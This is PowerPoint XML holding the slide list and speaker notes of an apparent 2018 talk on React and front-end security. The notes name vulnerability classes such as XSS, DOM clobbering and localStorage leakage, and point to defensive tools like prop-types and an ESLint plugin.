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37"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="264" r:id="rId3"/>
    <p:sldId id="291" r:id="rId4"/>
    <p:sldId id="304" r:id="rId5"/>
    <p:sldId id="290" r:id="rId6"/>
    <p:sldId id="289" r:id="rId7"/>
    <p:sldId id="292" r:id="rId8"/>
    <p:sldId id="293" r:id="rId9"/>
    <p:sldId id="266" r:id="rId10"/>
    <p:sldId id="268" r:id="rId11"/>
    <p:sldId id="258" r:id="rId12"/>
    <p:sldId id="288" r:id="rId13"/>
    <p:sldId id="259" r:id="rId14"/>
    <p:sldId id="262" r:id="rId15"/>
    <p:sldId id="267" r:id="rId16"/>
    <p:sldId id="261" r:id="rId17"/>
    <p:sldId id="263" r:id="rId18"/>
    <p:sldId id="272" r:id="rId19"/>
    <p:sldId id="294" r:id="rId20"/>
    <p:sldId id="282" r:id="rId21"/>
    <p:sldId id="295" r:id="rId22"/>
    <p:sldId id="273" r:id="rId23"/>
    <p:sldId id="274" r:id="rId24"/>
    <p:sldId id="269" r:id="rId25"/>
    <p:sldId id="296" r:id="rId26"/>
    <p:sldId id="297" r:id="rId27"/>
    <p:sldId id="286" r:id="rId28"/>
    <p:sldId id="298" r:id="rId29"/>
    <p:sldId id="285" r:id="rId30"/>
    <p:sldId id="283" r:id="rId31"/>
    <p:sldId id="277" r:id="rId32"/>
    <p:sldId id="301" r:id="rId33"/>
    <p:sldId id="270" r:id="rId34"/>
    <p:sldId id="299" r:id="rId35"/>
    <p:sldId id="300"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senia Peguero" initials="KP" lastIdx="4" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="S-1-5-21-32445488-941241147-642672607-472890" providerId="AD"/>
      </p:ext>
    </p:extLst>
  </p:cmAuthor>
  <p:cmAuthor id="2" name="Lewis Ardern" initials="LA" lastIdx="26" clrIdx="1">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="S-1-5-21-32445488-941241147-642672607-477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78" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="65" d="100"/>
          <a:sy n="65" d="100"/>
        </p:scale>
        <p:origin x="10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9C1469-6E22-4097-97FF-4A4CFAF81724}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/21/2018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9278AC-E332-4142-AA14-60688B5140C5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6775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actjs.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github.com/marcuswestin/store.js/"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github.com/zendesk/cross-storage"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github.com/yannickcr/eslint-plugin-reac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avascriptreport.com/the-ultimate-guide-to-javascript-framework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278AC-E332-4142-AA14-60688B5140C5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2535472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Cross-site Scripting, DOM-XSS  - Sensitive data stealing (tokens, API keys)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Expression Language Injection - Angular, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Vue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Often results in XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Clickjacking - Now with SVGs, no JavaScript required!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DOM clobbering – since</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2013 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Client-side trust - Too much data exposed to the client, Client-side validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CSRF - Client-side component with server-side verification</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Information leakage through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>localStorage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session ids, CSRF tokens, API keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DOM Clobbering from Gareth </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Heyes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> http://www.thespanner.co.uk/2013/05/16/dom-clobbering/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{ED9278AC-E332-4142-AA14-60688B5140C5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="280126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11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="600362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12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="381747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13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="142526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14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3816739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15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9961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linkClick r:id="rId3"/>
              </a:rPr>
              <a:t>React</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> was introduced as an open source project in May, 2013.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="931774">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr defTabSz="931774">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>React uses Functional programming</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> paradigm, although it’s not a fully functional language.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr defTabSz="931774">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr defTabSz="931774">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>One-way binding leads to more structured UIs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> with strong hierarchy.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr defTabSz="931774">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr defTabSz="931774">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In the meanwhile developers from AngularJS moved to React, as Angular was perceived as too unpredictable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr defTabSz="931774">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The original author was Jordan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Walke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, an engineer at Facebook.</a:t>
            </a:r>
          </a:p>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16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3859059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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1815789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18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4063465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D9278AC-E332-4142-AA14-60688B5140C5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="46895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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42164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HackerOne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> vulnerability: http://danlec.com/blog/xss-via-a-spoofed-react-element - Daniel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>LeCheminant</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>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20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="313506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21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4181949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22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1189602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23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1324929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24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1228954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25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="355488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26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1623307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27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2927382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28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="143879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29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="186581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3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="414800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Reference:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://stackoverflow.com/questions/33225951/evaling-code-with-jsx-syntax-in-it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://medium.com/dailyjs/exploiting-script-injection-flaws-in-reactjs-883fb1fe36c1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{ED9278AC-E332-4142-AA14-60688B5140C5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="402687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31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3935102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174708" indent="-174708">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://developer.mozilla.org/en-US/docs/Web/API/Fetch_API/Using_Fetch</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="174708" indent="-174708">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://fetch.spec.whatwg.org/#cors-protocol-and-credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="174708" indent="-174708">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://github.com/github/fetch</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="174708" indent="-174708">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> vulnerability in Redux: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://redux.js.org/advanced/example-reddit-api </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{ED9278AC-E332-4142-AA14-60688B5140C5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="378714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vulnerability is not React-specific. React itself doesn’t have any wrappers around the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>localStorage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> object. Usually,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>evelopers are just using the standard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> JavaScript API to set and retrieve data from it. H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>owever, there are libraries that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> enhance the use of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>localStorage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> and can be used in React apps:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="232943" indent="-232943">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/marcuswestin/store.js/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> uses local storage by default</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="232943" indent="-232943">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://github.com/zendesk/cross-storage</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="232943" indent="-232943">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>https://github.com/elgerlambert/redux-localstorage  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>References:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="931774">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://www.robinwieruch.de/local-storage-react/ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{ED9278AC-E332-4142-AA14-60688B5140C5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2132909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type checking – to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> prevent XSS: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://www.npmjs.com/package/prop-types  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ESLint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> has a React</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> plugin – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>ESLint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>-plugin-React: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/yannickcr/eslint-plugin-react/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The plugin mostly contains quality and style</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> rules, but it does have a few security rules, or rules that may lead to discovering security problems in the code.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{ED9278AC-E332-4142-AA14-60688B5140C5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1243897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35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2717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4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="235100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9278AC-E332-4142-AA14-60688B5140C5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="116971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According to JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Report.com and their “The Ultimate Guide to JavaScript frameworks” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://javascriptreport.com/the-ultimate-guide-to-javascript-frameworks/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ) there are over 50 client-side JavaScript frameworks. And most</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> of them appeared in the last 5-7 years. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
